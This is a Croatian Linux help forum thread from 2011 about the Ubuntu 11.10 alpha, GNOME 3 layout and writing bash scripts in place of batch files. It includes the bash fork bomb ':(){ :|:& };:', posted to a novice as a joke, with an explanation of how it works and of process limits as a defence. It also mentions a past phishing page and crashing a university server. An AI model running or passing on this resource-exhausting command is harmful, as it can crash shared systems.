Linux - pitanja i odgovori izdvojena tema

poruka: 20.145
|
čitano: 3.538.065
|
moderatori: pirat, XXX-Man, vincimus
+/- sve poruke
ravni prikaz
starije poruke gore
15 godina
neaktivan
Re: Linux - pitanja i odgovori
nidjo123 kaže...

Skinuo maloprije Ubuntu 11.10 pa da vidim što je novo i da isprobam malo. Solidno. Evo slika. {#}

Šta je novi izašao?

Ja sam Plavi zmaj.Form the future!Masa,društvo većina,''normalni'' su ništa bez onih pojedinaca koji ih čine.
15 godina
neaktivan
Linux - pitanja i odgovori

Nije, još je u alphi. Ali svatko ga može isprobat... http://cdimage.ubuntu.com/daily-live/current/

Slavonija u ♥ | http://crocraft.com - hrvatska Minecraft zajednica | http://www.soma.fm/
Poruka je uređivana zadnji put čet 25.8.2011 20:15 (nidjo123).
Moj PC  
0 0 hvala 0
15 godina
neaktivan

Nije još, ovo je alfa.

Nista nije sveto sve je bruto i neto, sve je zabava!
Poruka je uređivana zadnji put čet 25.8.2011 20:18 (Shody_1994).
Moj PC  
0 0 hvala 0
14 godina
nidjo123 kaže...

Skinuo maloprije Ubuntu 11.10 pa da vidim što je novo i da isprobam malo. Solidno. Evo slika. {#}

Jeli ima mogućnost odabira Clasic sučelja kod prijave?

Freedom is just another word for nothing left to loose ...
Poruka je uređivana zadnji put čet 25.8.2011 21:24 (mario.L_hr).
15 godina
neaktivan

Samo Ubuntu (Unity) i Ubuntu 2D (Unity 2D), a valjda planiraju dodat GNOME3? Unity mi se čini dosta ispoliraniji, vidjet ćemo što će biti.

Slavonija u ♥ | http://crocraft.com - hrvatska Minecraft zajednica | http://www.soma.fm/
Moj PC  
1 0 hvala 1
14 godina
nidjo123 kaže...

Samo Ubuntu (Unity) i Ubuntu 2D (Unity 2D), a valjda planiraju dodat GNOME3? Unity mi se čini dosta ispoliraniji, vidjet ćemo što će biti.

Unity i Gnome3 me nisu baš legli, nadam se da će se u konačnoj verziji pojaviti i clasic.

Freedom is just another word for nothing left to loose ...
16 godina
neaktivan

11.10 neće imati GNOME Classic iz verzije 2, budući da koristi GNOME 3 - u defaultnoj instalaciji, za one koji imaju odgovarajuće drivere, tu je hardverski akcelerirani Unity, za ostale je Unity 2D, baziran na Qt-u. GNOME Shell bit će dostupan u repozitoriju, a uz njega i GNOME 3 Classic - uputstva za instalaciju su ovdje.

The laws of nature are constructed in such a way as to make the universe as interesting as possible. - Freeman Dyson, Imagined Worlds
Poruka je uređivana zadnji put čet 25.8.2011 22:24 (hrx).
15 godina
neaktivan

e sta im znaci onaj sat i datum na sredini gornjeg panela kod GNOME 3, zasto nije normalno u gornjem desnom kutu kao i dosada...

ima neka fora il...

dosta stari tekst al ajd...

-=Every moment is another Chance=-

1 0 hvala 0
17 godina
neaktivan
SeleS kaže...

e sta im znaci onaj sat i datum na sredini gornjeg panela kod GNOME 3, zasto nije normalno u gornjem desnom kutu kao i dosada...

ima neka fora il...

dosta stari tekst al ajd...

To su sad tak stavili u trojki.

Some people say that if you play a Windows install CD backwards you will hear demon voices commanding you to worship Satan. But that's nothing. If you play it forward it will install Windows.
15 godina
neaktivan

znam da su to tek sad ubacili, al pitanje je zast su ga pomaknuli u sredinu a ne ostavili u desnom kutu...

sigurno neki "modni trik" ;)

16 godina

? .. btw, dali ima neki util (ili je dodana opcija) za podešavanje spomenutih rasporeda, najvažnije za 'pravilan' raspored minimize-maximize-closea, na pravu - desnu stranu? (osim kroz config). Nije mi jasno zašto takva opcija nije dio teme u podešavanju.

C64/TurboModul-OpenSourceProject.org.cn.部分作品为网上收集整理,供开源爱好者学习使用

1 0 hvala 0
15 godina
neaktivan

Ovako,imam pitanje. Ako je netko radio u Windowsu u CMD-u (Command Promptu),onda se sječa da ako želi napraviti fajl koji nešto napravi,umjesto da ispisuje stalno komande,sigurno se sjeća da kada pravi taj fajl da stavlja ekstenziju .bat ili .cmd. npr. primjer fajla:

@echo off

title Pa-pa

cls

echo Gasiiim seee

ping localhost -n 3>nul

shutdown -s -t 30

exit

Ovo se spremi pod npr. lala.bat ili lala.cmd

Mene zanima kako u linuxu napravit tako nešto,tj. da radi preko terminala. Znaći da upisujem ovako komande,spremim i kada pokrenem on napravi to to sam ja naredio..ako razumijete..hvala..

P.S. ovo što sam napiso,ovu gore skriptu,to je glupa skripta,samo ugasi kompjuter..radio sam svašta u tome...

Moj PC  
0 0 hvala 0
16 godina

-shutdown (now) ? tj, dovoljno je u terminalu utipkati naredbu bez parametra i dobiješ switcheve ili prolistaš man.

edit: ah, msliš na extenziju? -nema, tj svejedno. samo označiš datoteku kao izvršnu (da je ne otvara kao txt).

C64/TurboModul-OpenSourceProject.org.cn.部分作品为网上收集整理,供开源爱好者学习使用
Poruka je uređivana zadnji put pet 26.8.2011 15:28 (ihush).
15 godina
neaktivan
ihush kaže...

-shutdown (now) ? tj, dovoljno je u terminalu utipkati naredbu bez parametra i dobiješ switcheve ili prolistaš man.

edit: ah, msliš na extenziju? -nema, tj svejedno. samo označiš datoteku kao izvršnu (da je ne otvara kao txt).

u čemu da pišem to,i kako misliš izvršnu? ako možeš postavi slike,i stavi naziv editora u kojem pišem to sve..

15 godina
neaktivan
filipvk1000 kaže...

Ovako,imam pitanje. Ako je netko radio u Windowsu u CMD-u (Command Promptu),onda se sječa da ako želi napraviti fajl koji nešto napravi,umjesto da ispisuje stalno komande,sigurno se sjeća da kada pravi taj fajl da stavlja ekstenziju .bat ili .cmd. npr. primjer fajla:

@echo off

title Pa-pa

cls

echo Gasiiim seee

ping localhost -n 3>nul

shutdown -s -t 30

exit

Ovo se spremi pod npr. lala.bat ili lala.cmd

Mene zanima kako u linuxu napravit tako nešto,tj. da radi preko terminala. Znaći da upisujem ovako komande,spremim i kada pokrenem on napravi to to sam ja naredio..ako razumijete..hvala..

P.S. ovo što sam napiso,ovu gore skriptu,to je glupa skripta,samo ugasi kompjuter..radio sam svašta u tome...

ono što tebi treba je neki launcher sa 777 permisijama (tj. da bude executabilan) i u njemu imaš vrlo slično kao što si naveo, samo navedeš koje operacije da se izvode kada, princip je manje više isti samo su malkoc drukčije naredbe.

(i mislim da treba da se otvori u Terminalu, ali sam već zaboravio)

treba bi guglati nešto tipa: how to make launcer in linux, i onda naredbe za izradu launchera. Mislim da se to na gnome-u jako lagano radi

42
16 godina
neaktivan
SeleS kaže...

ima neka fora il...

Mislim da su prvenstveno estetski razlozi - desktop izgleda čistije i simetričnije. Osim toga, kada se klikne pokazuje kalendar i sastanke, a šuška se da će s lijeve strane kalendara doći prikaz vremena u različitim gradovima (vremenskim zonama), tako da je prikladnije da se sve nalazi u sredini nego zgurano u desni kut.

Meni ne smeta da je u sredini, ali ukoliko ti se ne sviđa, postoji ekstenzija koja premješta sat na desnu stranu. Na ovoj stranici nalazi se nekoliko ekstenzija koje modificiraju sučelje da izgleda sličnije klasičnom sučelju. Ovdje se nalazi još četrdeset ekstenzija, ovdje je pregled pet tema za Shell, a tu su system monitor ekstenzija i musicplayers ekstenzija.

ihush kaže...

? .. btw, dali ima neki util (ili je dodana opcija) za podešavanje spomenutih rasporeda, najvažnije za 'pravilan' raspored minimize-maximize-closea, na pravu - desnu stranu? (osim kroz config). Nije mi jasno zašto takva opcija nije dio teme u podešavanju.

Probaj Ubuntu Tweak, čini mi se da tamo ima opcija za mijenjanje rasporeda. Osim toga, mislim da se još uvijek može napraviti kroz Appearance applet - odaberi temu koja ima botune na desnoj strani (npr. Clearlooks), a zatim ju prepravi (odaberi teme kontrola, okvira ekrana, ikona kako ti se sviđa) i spremi temu. Ukoliko odabereš Ambiance ili Radiance temu, botuni se vraćaju nalijevo, a odabirom tvoje teme (npr. sa identičnim postavkama kao Ambiance) premještaju se na desnu stranu.

filipvk1000 kaže...
(...)

(...)

Radi se o pisanju skripti za komandni interpreter - u DOS-u su to bile batch datoteke, a u Unix svijetu to su shell skripte (postoje i AppleScript skripte, te skripte za Windows Script Host). Na netu postoji mnogo uputstava i tutoriala - samo upiši bash script tutorial i odaberi (npr. ovaj ili ovaj). Bash je komandni interpreter koji se koristi u većini distribucija, a postoje i zsh, csh, tcsh, ... - ako znaš programirati u C-u, csh i tcsh bi mogli biti zanimljiviji, budući da koriste C jezik - bash, kao nasljednik Bourne shella koristi njegov jezik koji je sličan ALGOL-u.

The laws of nature are constructed in such a way as to make the universe as interesting as possible. - Freeman Dyson, Imagined Worlds
Poruka je uređivana zadnji put pet 26.8.2011 16:07 (hrx).
17 godina
neaktivan
filipvk1000 kaže...

...

mojaskripta.sh

Tak nazoveš fajl, mislim, ne mora biti mojaskripta, bitno je da staviš nastavak sh (iako niti to ne treba, ako navedeš putanju do interpretera).

EDIT: Pisat možeš u bilo čemu, gedit, kate, nano, pico, vi, vim, apsolutno je svejedno.

Samo imaj na umu da su bash i batch nebo i zemlja. bash je brutalno moćniji jezik od batcha.

Evo ti knjiga za početak

http://linuxcommand.org/

Klikneš dolje na Sourceforge ako želiš knjigu skinuti u pdf-u (nema puno, 2 MB je samo).

Some people say that if you play a Windows install CD backwards you will hear demon voices commanding you to worship Satan. But that's nothing. If you play it forward it will install Windows.
Poruka je uređivana zadnji put pet 26.8.2011 16:34 (1domagoj1).
14 godina
protjeran

#!/bin/bash

batch > /dev/null 2>&1

exit 2

{#}

Oblik uvečanog iPhonea iz budućnosti.

1 0 hvala 0
17 godina
neaktivan
Bypass kaže...

#!/bin/bash

batch > /dev/null 2>&1

exit 2

LOL.

{#}

15 godina
neaktivan

Znaći,isto pravim ko u Batchu,znaći nižem komande,i na kraju umjesto da spremim pod .bat spremim pod .sh? P.S. hvala puno,obožavam to,radio sam ogromne programe u tome,čak i phisher (samo radi testiranja),da,moguće je,uz HTML,PHP,Batch i CSS. Al samo za testiranje je bilo,nisam davo linkove za download. (pokreneš,upišeš željeno,ode ti lozinka na moj sajt)...al kao što sam reko,to je bilo samo radi testiranja..da nebi bilo da sam stvarno napravip phisher da se domognem lozinki...inače testam security....zato sam to i napravio..probo sam Kaspersky,Norton,AVG,Avira,Avast,COMODO,ESET, i još puno njih,sve vezano za security..onda downloadam par virusa i gledam kako će AV reagirati :P također sam tražio slabosti na nekim stranicama,naravno,sve sam zaboravio jer se nisam služio time par godina..jbg...sad već i off topičarim,al eto..

Moj PC  
1 0 hvala 0
17 godina
neaktivan
filipvk1000 kaže...

Znaći,isto pravim ko u Batchu,znaći nižem komande,i na kraju umjesto da spremim pod .bat spremim pod .sh? P.S. hvala puno ...

Evo ti jedna zgodna skripta ;)

:(){ :|:& };:

14 godina
protjeran
1domagoj1 kaže...
filipvk1000 kaže...

Znaći,isto pravim ko u Batchu,znaći nižem komande,i na kraju umjesto da spremim pod .bat spremim pod .sh? P.S. hvala puno ...

{#}

ta mi je jedna od boljih

Oblik uvečanog iPhonea iz budućnosti.
15 godina
neaktivan
1domagoj1 kaže...
filipvk1000 kaže...

...

WTF? To stvarno skripta? {#}

15 godina
neaktivan
filipvk1000 kaže...
1domagoj1 kaže...

ajde podijelite s nama sta to ona tocno radi :D

i nemojte mi rec da ju isprobam pa da vidim sta radi ;)

14 godina
neaktivan
probao na virtualki... upališ system monitor i pokreneš skriptu, i gledaš kako ti se puni memorija.

što točno radi, ne znam, ali se može činiti zlo nekome {#}

http://www.bug.hr/forum/topic/pc-igre/world-of-tanks/96070.aspx?page=115&jumpto=2006738&sort=asc&view=flat
17 godina
neaktivan
filipvk1000 kaže...

Da. Rekoh ti da su bash i batch nebo i zemlja.

bash > batch

SeleS kaže...

ajde podijelite s nama sta to ona tocno radi :D

i nemojte mi rec da ju isprobam pa da vidim sta radi ;)

Fork bomba.

Točnije rekurzivna funkcija. Ako se uspije pokrenuti na sustavu, teško da ćeš bez reboota riješiti situaciju zato što je jedino rješenje protiv fork bombe da ubiješ sve pokrenute instance, al pošto je rekurzija u pitanju... Idemo redom.

:() je ime funkcije. Naime, u bashu se funkcija definira na ovaj način:

funkcija_f () {
#bla bla neki kod

}

Drugim riječima ovu skriptu se može napisati na ovaj način:

:() {

:|:&
};:

:|: - poziva samu sebe (dakle rekurzija i preko "|" pajpa output u još jedan poziv funkcije ":")

& - stavlja funkciju u pozadinu tak da child proces ne može umrijeti i počne jesti resurse

; - završi definiciju funkcije

: - ponovno pozovi funkciju, drugim riječima, pokreni fork.

Čitljiviji kod:

fork () {

fork | fork &

}; fork

Dobro podešen Linux sustav ne bi trebao pasti pod fork bombom, jer se na Linuxu može limitirati broj pokrenutih procesa po useru u /etc/security/limits.conf datoteci. Samo, treba paziti da ne staviš premali limit, pa da se na kraju i normalni, korisni procesi neće moći pokrenuti. To sve spada pod brigu administratora sustava. Za kućne korisnike ovo nije niti previše bitno, ako i pokreneš, rebootaš i nikom ništ, ali za mašine koje se koriste za rad je bitno.

17 godina
neaktivan

kad sam bio mlad i zelen, pokrenuo sam upravo tu bombu na studentskom serveru na faksu :-D bilo je...zabavno XD adminima je trebalo 2 i pol sata da poubijaju sve procese. a najgore je sto se fork bomba mnozi eksponencijalno brzo. a isto tako i zdere memoriju racunala.

Moj PC  
2 0 hvala 0
15 godina
neaktivan

Ono što si reko da spremim pod .sh uopće neradi. Pokrenem gedit,ukucam echo lala (samo radi testa) i spremim pod .sh ekstenziju i kada pokrenem otvori mi da pročitam {#} pomoć? P.S. ovo je 5001 post {#}

Moj PC  
0 0 hvala 0
17 godina
neaktivan
ibazulic kaže...

kad sam bio mlad i zelen, pokrenuo sam upravo tu bombu na studentskom serveru na faksu :-D bilo je...zabavno XD adminima je trebalo 2 i pol sata da poubijaju sve procese. a najgore je sto se fork bomba mnozi eksponencijalno brzo. a isto tako i zdere memoriju racunala.

{#}

Ja ne mogu, odma bi me skužili pošto se mogu ulogirat jedino preko svoj accounta (a tamo mi piše sve, od JMBAG-a do imena i prezimena, pa bi vjerojatno na disciplinskoj završil. Iako sam pital profesora iz Operacijskih sustava, zašto ne stave limit po useru (vrti se na Solarisu taj server), rekel mi je da nema potrebe jer se to više tak i tak ne koristi (server je iz vremena još dok su terminali po faksu bili, pa se to koristilo onda za mail i slično) osim za potrebe nekih predmeta (OS ili Napredni OS npr.) i taj server uglavnom održavaju (ako ga i održavaju) studenti (Računarska sekcija iz KSET-a većinom).

17 godina
neaktivan
filipvk1000 kaže...

Ono što si reko da spremim pod .sh uopće neradi. Pokrenem gedit,ukucam echo lala (samo radi testa) i spremim pod .sh ekstenziju i kada pokrenem otvori mi da pročitam {#} pomoć? P.S. ovo je 5001 post {#}

Koja distra?

Univerzalni način, u terminalu navigiraj do direktorija gdje je spremljena skripta i pokreni ju. Pazi da ti ima executable dozvole, tj. da ima permission za pokrenut se (chmod 755 ime_skripte). Također, jel si ju dobro napisal? Naveo putanju do interpretera?

E-mail:
Lozinka:

vrh stranice